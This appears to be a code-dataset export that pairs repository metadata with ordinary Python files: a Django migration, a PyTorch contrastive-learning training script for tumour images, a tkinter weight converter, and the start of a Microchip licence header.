| 46.206186 | 245 | 0.623159 | 1,257 | 8,964 | 4.232299 | 0.210819 | 0.030075 | 0.011842 | 0.019737 | 0.318233 | 0.245113 | 0.17782 | 0.133459 | 0.129323 | 0.114662 | 0 | 0.0233 | 0.233936 | 8,964 | 193 | 246 | 46.445596 | 0.75142 | 0.19411 | 0 | 0.077519 | 0 | 0.007752 | 0.073625 | 0 | 0 | 0 | 0 | 0 | 0.007752 | 1 | 0.054264 | false | 0 | 0.108527 | 0.007752 | 0.209302 | 0.015504 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8652ce1f4d491ac51c01beec050b8b2ec65cf9 | 537 | py | Python | foundation/organisation/migrations/0008_auto_20160707_0752.py | breck7/website | e1d72c3db7612aaa64c47fb6117a788b955c4ab0 | [
"MIT"
] | 74 | 2016-06-27T17:06:44.000Z | 2022-03-20T19:42:07.000Z | foundation/organisation/migrations/0008_auto_20160707_0752.py | breck7/website | e1d72c3db7612aaa64c47fb6117a788b955c4ab0 | [
"MIT"
] | 370 | 2016-06-09T09:15:00.000Z | 2022-03-28T19:02:31.000Z | foundation/organisation/migrations/0008_auto_20160707_0752.py | Mattlk13/website | 83abd726ae3ae377480010fd46e9c141bc76b39e | [
"MIT"
] | 104 | 2016-06-09T15:16:02.000Z | 2022-03-12T13:14:10.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('organisation', '0007_add_old_project_bool_to_project_model'),
]
operations = [
migrations.AlterField(
model_name='networkgroupmembership',
name='order',
field=models.IntegerField(help_text=b'The lower the number the higher on the page this Person will be shown.', null=True, blank=True),
),
]
| 26.85 | 146 | 0.662942 | 60 | 537 | 5.7 | 0.783333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.236499 | 537 | 19 | 147 | 28.263158 | 0.821951 | 0.039106 | 0 | 0 | 0 | 0 | 0.293774 | 0.124514 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8ac7cbb9f4d5011c5d79818e1d5441c30c36b1 | 27,134 | py | Python | train_bk_cl_redo.py | Eren-Corn0712/CV_DL-Contrastive-Learning | c59ba5e2ae31c14ef4e175c79e3575e2cc7c439c | [
"MIT"
] | null | null | null | train_bk_cl_redo.py | Eren-Corn0712/CV_DL-Contrastive-Learning | c59ba5e2ae31c14ef4e175c79e3575e2cc7c439c | [
"MIT"
] | null | null | null | train_bk_cl_redo.py | Eren-Corn0712/CV_DL-Contrastive-Learning | c59ba5e2ae31c14ef4e175c79e3575e2cc7c439c | [
"MIT"
] | null | null | null | import os
import argparse
import math
import datetime
import pandas as pd
import torch.utils.data
import torch
import wandb
import wandb.sklearn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
import warnings
from torchvision.datasets import ImageFolder
from util import AverageMeter, ContrastiveTransformations
from util import adjust_learning_rate, warmup_learning_rate
from util import set_optimizer, save_model, same_seeds
from tqdm import tqdm
from sklearn.metrics import accuracy_score, classification_report
from aug_util import show_augmentation_image, test_weight_sampler
from aug_util import Erosion, Resize_Pad, GaussianBlur
from pytorch_metric_learning.losses import SupConLoss, NTXentLoss
from torch.utils.data import WeightedRandomSampler
from model import CLRBackbone, CLRLinearClassifier, CLRClassifier
try:
import apex
from apex import amp, optimizers
except ImportError:
pass
train_path = 'tumor_data/train'
test_path = 'tumor_data/test'
exp_time = datetime.datetime.today().date()
project = f'CLR_Project_implicit_resnet18'
num_workers = int(os.cpu_count() / 4)
warnings.filterwarnings("ignore")
def make_weights_for_balanced_classes(images, nclasses):
count = [0] * nclasses
for item in images:
count[item[1]] += 1
weight_per_class = [0.] * nclasses
N = float(sum(count))
for i in range(nclasses):
weight_per_class[i] = N / float(count[i])
weight = [0] * len(images)
for idx, val in enumerate(images):
weight[idx] = weight_per_class[val[1]]
return weight
class SimCLRFTransform:
    def __init__(self, opt, eval_transform: bool = False) -> None:
self.normalize = transforms.Normalize(mean=opt.mean, std=opt.std)
s = 1.0
self.color_jitter = transforms.ColorJitter(0.8 * s, 0.8 * s, 0.8 * s, 0.2 * s)
self.resize = transforms.Resize(size=(opt.size, opt.size))
self.random_crop_resize = transforms.RandomResizedCrop(size=opt.size, scale=(0.2, 1.))
self.erosion = Erosion(p=0.5)
if not eval_transform:
data_transforms = [
transforms.RandomVerticalFlip(p=0.5),
transforms.RandomHorizontalFlip(p=0.5),
# transforms.RandomApply([self.color_jitter], p=0.8),
transforms.RandomChoice([
transforms.RandomEqualize(p=0.5),
transforms.RandomAutocontrast(p=0.5),
transforms.RandomAdjustSharpness(2, p=0.5),
]),
transforms.RandomGrayscale(p=0.2),
Resize_Pad(opt.size)
]
else:
data_transforms = [
# transforms.RandomHorizontalFlip(p=0.5),
Resize_Pad(opt.size)
]
if opt.gaussian_blur:
kernel_size = int(0.1 * opt.size)
if kernel_size % 2 == 0:
kernel_size += 1
data_transforms.append(GaussianBlur(kernel_size=kernel_size, p=0.5))
if self.normalize is None:
final_transform = transforms.ToTensor()
else:
            final_transform = transforms.Compose([transforms.ToTensor()])  # note: self.normalize is defined above but not applied here
data_transforms.append(final_transform)
self.transform = transforms.Compose(data_transforms)
def __call__(self, sample):
return self.transform(sample)
def parse_option_bk():
parser = argparse.ArgumentParser('argument for training')
# Training Hyper-parameter
parser.add_argument('--batch_size', type=int, default=64,
help='batch_size')
parser.add_argument('--num_workers', type=int, default=num_workers,
help='num of workers to use')
parser.add_argument('--epochs', type=int, default=350,
help='number of training epochs')
# optimization
parser.add_argument('--learning_rate', type=float, default=0.5,
help='learning rate')
parser.add_argument('--lr_decay_epochs', type=str, default='250,300,350',
help='where to decay lr, can be a list')
parser.add_argument('--lr_decay_rate', type=float, default=0.1,
help='decay rate for learning rate')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='weight decay')
parser.add_argument('--momentum', type=float, default=0.9,
help='momentum')
# model dataset
parser.add_argument('--model', type=str, default='implicit_resnet18')
parser.add_argument('--head', type=str, default='mlp_bn', choices=['mlp', 'mlp_bn', '2mlp_bn'])
parser.add_argument('--feat_dim', type=int, default=256)
parser.add_argument('--dataset', type=str, default='tumor',
choices=['tumor', 'path'], help='dataset')
parser.add_argument('--mean', type=str, help='mean of dataset in path in form of str tuple')
parser.add_argument('--std', type=str, help='std of dataset in path in form of str tuple')
parser.add_argument('--size', type=int, default=224, help='parameter for RandomResizedCrop')
# method
parser.add_argument('--method', type=str, default='SupCon',
choices=['SupCon', 'SimCLR'], help='choose method')
# temperature
parser.add_argument('--temp', type=float, default=0.1,
help='temperature for loss function')
# other setting
parser.add_argument('--cosine', type=bool, default=True,
help='using cosine annealing')
parser.add_argument('--warm', action='store_true',
help='warm-up for large batch training')
parser.add_argument('--trial', type=str, default='0',
help='id for recording multiple runs')
parser.add_argument('--gaussian_blur', type=bool, default=True,
help='Gaussian_blur for DataAugmentation')
opt = parser.parse_args()
return opt
def parse_option_linear():
parser = argparse.ArgumentParser('argument for training')
parser.add_argument('--batch_size', type=int, default=64,
help='batch_size')
parser.add_argument('--num_workers', type=int, default=num_workers,
help='num of workers to use')
parser.add_argument('--epochs', type=int, default=100,
help='number of training epochs')
# optimization
parser.add_argument('--learning_rate', type=float, default=0.1,
help='learning rate')
parser.add_argument('--lr_decay_epochs', type=str, default='50,75,90',
help='where to decay lr, can be a list')
parser.add_argument('--lr_decay_rate', type=float, default=0.2,
help='decay rate for learning rate')
parser.add_argument('--weight_decay', type=float, default=0,
help='weight decay')
parser.add_argument('--momentum', type=float, default=0.9,
help='momentum')
# model dataset
parser.add_argument('--model', type=str, default='implicit_resnet18')
parser.add_argument('--dataset', type=str, default='tumor',
choices=['tumor', 'path'], help='dataset')
parser.add_argument('--size', type=int, default=224, help='parameter for Resize')
# other setting
parser.add_argument('--cosine', type=bool, default=True,
help='using cosine annealing')
parser.add_argument('--warm', action='store_true',
help='warm-up for large batch training')
# load pre-train model
parser.add_argument('--trial', type=str, default='0',
help='id for recording multiple runs')
# method
parser.add_argument('--method', type=str, default='SupCon',
choices=['SupCon', 'SimCLR'], help='choose method')
parser.add_argument('--gaussian_blur', type=bool, default=False,
help='Gaussian_blur for DataAugmentation')
parser.add_argument('--classifier', type=str, default='ML',
choices=['ML', 'SL'])
opt = parser.parse_args()
return opt
def set_folder_bk(opt):
opt.model_path = './save_{}/{}_models'.format(exp_time, opt.dataset)
opt.wandb_path = './save_{}/{}_wandb'.format(exp_time, opt.dataset)
iterations = opt.lr_decay_epochs.split(',')
opt.lr_decay_epochs = list([])
for it in iterations:
opt.lr_decay_epochs.append(int(it))
opt.model_name = '{}_{}_{}_lr_{}_decay_{}_bsz_{}_temp_{}_trial_{}'. \
format(opt.method, opt.dataset, opt.model, opt.learning_rate,
opt.weight_decay, opt.batch_size, opt.temp, opt.trial)
# warm-up for large-batch training,
if opt.batch_size > 32:
opt.warm = True
if opt.warm:
opt.model_name = '{}_warm'.format(opt.model_name)
opt.warmup_from = 0.01
opt.warm_epochs = 10
if opt.cosine:
eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)
opt.warmup_to = eta_min + (opt.learning_rate - eta_min) * (
1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2
else:
opt.warmup_to = opt.learning_rate
# If the pathname refers to an existing directory
opt.wandb_folder = os.path.join(opt.wandb_path, opt.model_name)
if not os.path.isdir(opt.wandb_folder):
os.makedirs(opt.wandb_folder)
opt.save_folder = os.path.join(opt.model_path, opt.model_name)
if not os.path.isdir(opt.save_folder):
os.makedirs(opt.save_folder)
return opt
def set_loader_bk(opt):
# construct data loader
if opt.dataset == 'tumor':
mean = (0.1771, 0.1771, 0.1771)
std = (0.1842, 0.1842, 0.1842)
elif opt.dataset == 'path':
mean = eval(opt.mean)
std = eval(opt.std)
else:
raise ValueError('dataset not supported: {}'.format(opt.dataset))
opt.mean = mean
opt.std = std
train_transform = SimCLRFTransform(opt, eval_transform=False)
test_transform = SimCLRFTransform(opt, eval_transform=False)
opt.train_transform = list(train_transform.transform.transforms)
opt.test_transform = list(test_transform.transform.transforms)
if opt.dataset == 'tumor':
opt.train_path = train_path
opt.test_path = test_path
train_dataset = ImageFolder(opt.train_path,
ContrastiveTransformations(train_transform))
test_dataset = ImageFolder(opt.test_path,
ContrastiveTransformations(test_transform))
else:
raise ValueError(opt.dataset)
weights = make_weights_for_balanced_classes(train_dataset.imgs, len(train_dataset.classes))
weights = torch.DoubleTensor(weights)
sampler = WeightedRandomSampler(weights, len(weights))
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=opt.batch_size,
num_workers=opt.num_workers,
sampler=sampler,
pin_memory=True, )
test_loader = torch.utils.data.DataLoader(
test_dataset,
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True, )
return train_loader, test_loader
def set_loader_linear(opt):
# construct data loader
if opt.dataset == 'tumor':
mean = (0.1771, 0.1771, 0.1771)
std = (0.1842, 0.1842, 0.1842)
elif opt.dataset == 'path':
mean = eval(opt.mean)
std = eval(opt.std)
else:
raise ValueError('dataset not supported: {}'.format(opt.dataset))
opt.mean = mean
opt.std = std
train_transform = SimCLRFTransform(opt, eval_transform=False)
test_transform = SimCLRFTransform(opt, eval_transform=True)
opt.train_transform = list(train_transform.transform.transforms)
opt.test_transform = list(test_transform.transform.transforms)
if opt.dataset == 'tumor':
opt.train_path = train_path
opt.test_path = test_path
train_dataset = ImageFolder(opt.train_path,
train_transform)
test_dataset = ImageFolder(opt.test_path,
test_transform)
else:
raise ValueError(opt.dataset)
weights = make_weights_for_balanced_classes(train_dataset.imgs, len(train_dataset.classes))
weights = torch.DoubleTensor(weights)
sampler = WeightedRandomSampler(weights, len(weights))
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=opt.batch_size,
sampler=sampler,
num_workers=opt.num_workers,
pin_memory=True,
)
test_loader = torch.utils.data.DataLoader(
test_dataset,
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True,
)
return train_dataset, train_loader, test_dataset, test_loader
def set_folder_linear(opt):
opt.model_path = './save_{}/cls_{}_models'.format(exp_time, opt.dataset)
opt.wandb_path = './save_{}/cls_{}_wandb'.format(exp_time, opt.dataset)
iterations = opt.lr_decay_epochs.split(',')
opt.lr_decay_epochs = list([])
for it in iterations:
opt.lr_decay_epochs.append(int(it))
opt.model_name = '{}_{}_{}_lr_{}_decay_{}_bsz_{}_{}'. \
format(opt.method, opt.dataset, opt.model, opt.learning_rate, opt.weight_decay,
opt.batch_size, opt.trial)
if opt.cosine:
opt.model_name = '{}_cosine'.format(opt.model_name)
# warm-up for large-batch training,
if opt.warm:
opt.model_name = '{}_warm'.format(opt.model_name)
opt.warmup_from = 0.01
opt.warm_epochs = 10
if opt.cosine:
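            # Warm up toward the value the cosine schedule takes at warm_epochs,
            # so the learning rate is continuous at the hand-off.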
eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)
opt.warmup_to = eta_min + (opt.learning_rate - eta_min) * (
1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2
else:
opt.warmup_to = opt.learning_rate
if opt.dataset == 'tumor':
opt.n_cls = 2
else:
raise ValueError('dataset not supported: {}'.format(opt.dataset))
opt.wandb_folder = os.path.join(opt.wandb_path, opt.model_name)
if not os.path.isdir(opt.wandb_folder):
os.makedirs(opt.wandb_folder)
opt.save_folder = os.path.join(opt.model_path, opt.model_name)
if not os.path.isdir(opt.save_folder):
os.makedirs(opt.save_folder)
return opt
def set_backbone(opt):
model = CLRBackbone(name=opt.model, head=opt.head, feat_dim=opt.feat_dim)
if opt.method == 'SupCon':
criterion = SupConLoss(temperature=opt.temp)
elif opt.method == 'SimCLR':
criterion = NTXentLoss(temperature=opt.temp)
else:
raise ValueError('contrastive method not supported: {}'.
format(opt.method))
if torch.cuda.is_available():
model = model.cuda()
criterion = criterion.cuda()
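        # let cuDNN benchmark and cache the fastest conv algorithms for the
        # fixed input size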
cudnn.benchmark = True
return model, criterion
def train_backbone(train_loader, model, criterion, optimizer, epoch, opt):
"""one epoch training"""
model.train()
losses = AverageMeter()
process_bar = tqdm(train_loader, total=len(train_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'TB epoch:{epoch} {opt.model}')
for idx, (images, labels) in enumerate(process_bar):
# [AugmentImage1,AugmentImage2]
images = torch.cat([images[0], images[1]], dim=0)
if torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
bsz = labels.shape[0]
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_loader), optimizer)
# compute loss
features = model(images) # features size is 2B x 128
if opt.method == 'SupCon':
labels = torch.cat([labels, labels], dim=0).to(device=features.device) # (B)-> (2B)
loss = criterion(features, labels)
elif opt.method == 'SimCLR':
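            # instance discrimination: each image index acts as its own class,
            # so the two augmented views of an image share a pseudo-label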
labels = torch.arange(bsz).to(device=features.device)
labels = torch.cat([labels, labels], dim=0) # (B) -> (2B)
loss = criterion(features, labels)
else:
raise ValueError('contrastive method not supported: {}'.
format(opt.method))
# update metric
losses.update(loss.item(), bsz)
# SGD
optimizer.zero_grad()
loss.backward()
optimizer.step()
process_bar.set_postfix_str(
'loss {loss.val:.4f} ({loss.avg:.4f})'.format(loss=losses))
return losses.avg
def train_linear(train_loader, model, classifier, criterion, optimizer, epoch, opt):
"""one epoch training"""
model.eval()
classifier.train()
losses = AverageMeter()
top1 = AverageMeter()
process_bar = tqdm(train_loader, total=len(train_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'TC epoch:{epoch} {opt.model}')
for idx, (images, labels) in enumerate(process_bar):
if torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
bsz = labels.shape[0]
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_loader), optimizer)
# compute loss
with torch.no_grad():
features = model.encoder(images)
output = classifier(features.detach())
loss = criterion(output, labels)
predictions = torch.argmax(output, 1)
# update metric
acc = accuracy_score(y_true=labels.view(-1).detach().cpu().numpy(),
y_pred=predictions.view(-1).detach().cpu().numpy(),
normalize=True)
losses.update(loss.item(), bsz)
top1.update(acc)
# SGD
optimizer.zero_grad()
loss.backward()
optimizer.step()
process_bar.set_postfix_str(
'loss {loss.val:.3f} ({loss.avg:.3f}) Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(loss=losses, top1=top1))
return losses.avg, top1.avg
def validation_backbone(val_loader, model, criterion, opt):
"""one epoch training"""
model.eval()
losses = AverageMeter()
with torch.no_grad():
process_bar = tqdm(val_loader, total=len(val_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'VB:{opt.model}')
for idx, (images, labels) in enumerate(process_bar):
images = torch.cat([images[0], images[1]], dim=0)
if torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
bsz = labels.shape[0]
# compute loss
features = model(images) # 2B x 128
if opt.method == 'SupCon':
labels = torch.cat([labels, labels], dim=0) # (B,)-> (2B,)
loss = criterion(features, labels)
elif opt.method == 'SimCLR':
                labels = torch.arange(bsz).to(device=features.device)
labels = torch.cat([labels, labels], dim=0)
loss = criterion(features, labels)
else:
raise ValueError('contrastive method not supported: {}'.
format(opt.method))
# update metric
losses.update(loss.item(), bsz)
process_bar.set_postfix_str(
'loss {loss.val:.4f} ({loss.avg:.4f})'.format(loss=losses))
return losses.avg
def validate_linear(val_loader, model, classifier, criterion, opt):
"""validation"""
model.eval()
classifier.eval()
losses = AverageMeter()
top1 = AverageMeter()
y_pred = list() # save predict label
y_true = list() # save ground truth
with torch.no_grad():
process_bar = tqdm(val_loader, total=len(val_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'VC:{opt.model}')
for idx, (images, labels) in enumerate(process_bar):
images = images.float().cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
bsz = labels.shape[0]
# forward and freeze backbone network
output = classifier(model.encoder(images))
loss = criterion(output, labels)
            # update metrics
            losses.update(loss.item(), bsz)
            predictions = torch.argmax(output, 1)
            acc = accuracy_score(y_true=labels.view(-1).detach().cpu().numpy(),
                                 y_pred=predictions.view(-1).detach().cpu().numpy(),
                                 normalize=True)
            top1.update(acc)
# update y_pred and y_true
y_pred.extend(predictions.view(-1).detach().cpu().numpy())
y_true.extend(labels.view(-1).detach().cpu().numpy())
process_bar.set_postfix_str(
'loss {loss.val:.3f} ({loss.avg:.3f}) Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(loss=losses,
top1=top1))
print(' * Acc@1 {top1.avg:.3f}'.format(top1=top1))
return losses.avg, top1.avg, y_pred, y_true
def set_model_linear(opt):
if opt.classifier == 'SL':
classifier = CLRLinearClassifier(name=opt.model, num_classes=opt.n_cls)
elif opt.classifier == 'ML':
classifier = CLRClassifier(name=opt.model, num_classes=opt.n_cls)
else:
        raise ValueError('classifier type not supported: {}'.format(opt.classifier))
criterion = torch.nn.CrossEntropyLoss()
classifier = classifier.cuda()
criterion = criterion.cuda()
return classifier, criterion
def main():
opt_bk = parse_option_bk()
# random seed
same_seeds(seed=2022)
# create folder
set_folder_bk(opt_bk)
# build data loader
train_loader, test_loader = set_loader_bk(opt_bk)
show_augmentation_image(train_loader)
test_weight_sampler(train_loader)
# build model and linear_criterion
backbone, backbone_criterion = set_backbone(opt_bk)
# build optimizer
optimizer = set_optimizer(opt_bk, backbone)
# wandb
    your_api_key = os.environ.get('WANDB_API_KEY')  # read the key from the environment instead of hard-coding it
    wandb.login(key=your_api_key)
wandb.init(dir=opt_bk.wandb_folder,
config=vars(opt_bk),
project=project,
name=f'B_{opt_bk.model}_{opt_bk.method}_{opt_bk.trial}'
)
wandb.watch(models=backbone,
criterion=backbone_criterion,
log_freq=100,
log_graph=True,
log="all", )
for epoch in range(1, opt_bk.epochs + 1):
adjust_learning_rate(opt_bk, optimizer, epoch)
# train for one epoch
loss = train_backbone(train_loader, backbone, backbone_criterion, optimizer, epoch, opt_bk)
val_loss = validation_backbone(test_loader, backbone, backbone_criterion, opt_bk)
# wandb logger
wandb.log({'train_loss': loss, 'val_loss': val_loss, 'epoch': epoch}, )
wandb.log({'learning_rate': optimizer.param_groups[0]['lr'], 'epoch': epoch})
# save the last model
    save_file = os.path.join(opt_bk.save_folder, 'last.pth')
save_model(backbone, optimizer, opt_bk, opt_bk.epochs, save_file)
wandb.finish()
# -------------------------------------------------------------------------
best_acc = 0
opt_linear = parse_option_linear()
# create folder
set_folder_linear(opt_linear)
# build data loader
train_dataset, train_loader, test_dataset, test_loader = set_loader_linear(opt_linear)
    # class names are needed to plot the confusion matrix
class_names: list = train_dataset.classes
# build model and linear_criterion
classifier, linear_criterion = set_model_linear(opt_linear)
# build optimizer
optimizer = set_optimizer(opt_linear, classifier)
# wandb
wandb.init(dir=opt_linear.wandb_folder,
config=vars(opt_linear),
project=project,
name=f'L_{opt_linear.model}_{opt_linear.method}_{opt_linear.trial}',
)
wandb.watch(models=classifier,
criterion=linear_criterion,
log_freq=100,
log_graph=True,
log="all")
# training routine
for epoch in range(1, opt_linear.epochs + 1):
adjust_learning_rate(opt_linear, optimizer, epoch)
train_loss, train_acc = train_linear(train_loader, backbone, classifier,
linear_criterion,
optimizer, epoch, opt_linear)
# eval for one epoch
val_loss, val_acc, y_pred, y_true = validate_linear(test_loader, backbone, classifier,
linear_criterion, opt_linear)
wandb.log({'Train_Loss': train_loss, 'Val_Loss': val_loss, 'epoch': epoch})
wandb.log({'Train_Acc': train_acc, 'Val_Acc': val_acc, 'epoch': epoch})
wandb.log({'lr': optimizer.param_groups[0]['lr'], 'epoch': epoch})
result = classification_report(y_pred=y_pred, y_true=y_true, target_names=class_names, output_dict=True)
df = pd.DataFrame(result).transpose()
if val_acc > best_acc:
best_acc = val_acc
wandb.run.summary["best_accuracy"] = best_acc
# Create csv file to record experiment result
save_file = os.path.join(opt_linear.save_folder, f'ckpt_cls_{best_acc:.2f}.pth')
save_model(classifier, optimizer, opt_linear, opt_linear.epochs, save_file)
csv_file = os.path.join(opt_linear.save_folder, f'{epoch}_{best_acc:.2f}.csv')
df.to_csv(csv_file)
if epoch == opt_linear.epochs:
            csv_file = os.path.join(opt_linear.save_folder, 'last.csv')
df.to_csv(csv_file)
print('best accuracy: {:.2f}'.format(best_acc))
# save the last model
save_file = os.path.join(opt_linear.save_folder, 'ckpt_cls_last.pth')
save_model(classifier, optimizer, opt_linear, opt_linear.epochs, save_file)
# Finish wandb
wandb.finish()
if __name__ == '__main__':
main()
| 37.119015 | 121 | 0.60098 | 3,209 | 27,134 | 4.889685 | 0.124026 | 0.021796 | 0.04117 | 0.007457 | 0.640176 | 0.606335 | 0.580014 | 0.563763 | 0.531961 | 0.515582 | 0 | 0.015332 | 0.281271 | 27,134 | 730 | 122 | 37.169863 | 0.789252 | 0.048021 | 0 | 0.541586 | 0 | 0.003868 | 0.103237 | 0.014109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030948 | false | 0.001934 | 0.05029 | 0.001934 | 0.110251 | 0.003868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8ca0227c9aa50fd561c605a0cf30890d4c5368 | 2,672 | py | Python | Weight Converter By Coder Mohit.py | Mohit1108/Weight-Converter-By-Coder-Mohit | 76a634ac401888e8268f2511902bb7f5780faa93 | [
"MIT"
] | 3 | 2021-06-13T22:48:16.000Z | 2021-07-09T13:07:51.000Z | Weight Converter By Coder Mohit.py | Mohit1108/Weight-Converter-By-Coder-Mohit | 76a634ac401888e8268f2511902bb7f5780faa93 | [
"MIT"
] | null | null | null | Weight Converter By Coder Mohit.py | Mohit1108/Weight-Converter-By-Coder-Mohit | 76a634ac401888e8268f2511902bb7f5780faa93 | [
"MIT"
] | null | null | null | from tkinter import *
window = Tk()
window.title('Weight converter By Coder Mohit ')
def from_kg():
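    # Convert the kilogram entry using approximate factors
    # (1 kg ~ 2.205 lb, 1 kg ~ 35.274 oz).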
    Gram = float(e2_value.get())*1000
    Milligram = float(e2_value.get())*1000000
    Microgram = float(e2_value.get())*1000000000
    Tonne = float(e2_value.get())/1000
    Pound = float(e2_value.get())*2.205
    Ounce = float(e2_value.get())*35.274
    t1.delete("1.0",END)
    t1.insert(END, Gram)
    t2.delete("1.0",END)
    t2.insert(END, Milligram)
    t3.delete("1.0",END)
    t3.insert(END, Microgram)
    t4.delete("1.0",END)
    t4.insert(END, Tonne)
    t5.delete("1.0",END)
    t5.insert(END, Pound)
    t6.delete("1.0",END)
    t6.insert(END, Ounce)
def website():
import webbrowser
url = 'https://codermohit.com'
webbrowser.open(url)
def youtube():
import webbrowser
url = 'https://www.youtube.com/channel/UCaqKx5W0cSS0l2i2GgKQw9g?sub_confirmation=1'
webbrowser.open(url)
def exit():
window.destroy()
e1 = Label(window, text="Input the weight in KG",font=('Courier',15,'bold'))
e2_value = StringVar()
e2 = Entry(window, textvariable=e2_value,font=('Courier',15,))
e3 = Label(window, text="Gram",font=('Courier',15,))
e4 = Label(window, text="Miligram",font=('Courier',15,))
e5 = Label(window, text="Microgram",font=('Courier',15,))
e6 = Label(window, text="Tone",font=('Courier',15,))
e7 = Label(window, text="Pound",font=('Courier',15,))
e8 = Label(window, text="Ounce",font=('Courier',15,))
t1 = Text(window, height=7, width=30)
t2 = Text(window, height=7, width=30)
t3 = Text(window, height=7, width=30)
t4 = Text(window, height=7, width=30)
t5 = Text(window, height=7, width=30)
t6 = Text(window, height=7, width=30)
b1 = Button(window, text="Convert",font=('Courier',15,'bold'), command=from_kg,fg='white')
b2 = Button(window, text="Exit",font=('Courier',15,'bold'), command=exit,fg='white')
b3 = Button(window, text="Website",font=('Courier',15,'bold'), command=website,fg='white')
b4 = Button(window, text="YouTube",font=('Courier',15,'bold'), command=youtube,fg='white')
e1.grid(row=0, column=0)
e2.grid(row=0, column=1)
e3.grid(row=1, column=0)
e4.grid(row=1, column=1)
e5.grid(row=1, column=2)
e6.grid(row=3, column=0)
e7.grid(row=3, column=1)
e8.grid(row=3, column=2)
t1.grid(row=2, column=0)
t2.grid(row=2, column=1)
t3.grid(row=2, column=2)
t4.grid(row=4, column=0)
t5.grid(row=4, column=1)
t6.grid(row=4, column=2)
b1.grid(row=0, column=2)
b1.config(bg='green')
b2.grid(row=5, column=2)
b2.config(bg='#8B0000')
b3.grid(row=5, column=0)
b3.config(bg='#fb2056')
b4.grid(row=5, column=1)
b4.config(bg='#c4302b')
window.mainloop()
| 32.192771 | 91 | 0.646707 | 433 | 2,672 | 3.965358 | 0.233256 | 0.073384 | 0.090856 | 0.052417 | 0.16191 | 0.083867 | 0 | 0 | 0 | 0 | 0 | 0.089395 | 0.145958 | 2,672 | 82 | 92 | 32.585366 | 0.663015 | 0 | 0 | 0.054054 | 0 | 0 | 0.146332 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.040541 | 0 | 0.094595 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8f886cd6aace4df9f638acf92dd610922773ad | 5,732 | py | Python | peripheral/cache/config/cache.py | Unitek-KL/csp | 2ac7ba59465f23959e51d2f16a5712b57b79ef5f | [
"0BSD"
] | null | null | null | peripheral/cache/config/cache.py | Unitek-KL/csp | 2ac7ba59465f23959e51d2f16a5712b57b79ef5f | [
"0BSD"
] | null | null | null | peripheral/cache/config/cache.py | Unitek-KL/csp | 2ac7ba59465f23959e51d2f16a5712b57b79ef5f | [
"0BSD"
] | null | null | null | """*****************************************************************************
* Copyright (C) 2019 Microchip Technology Inc. and its subsidiaries.
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to comply with third party license terms applicable to your
* use of third party software (including open source software) that may
* accompany Microchip software.
*
* THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
* PARTICULAR PURPOSE.
*
* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
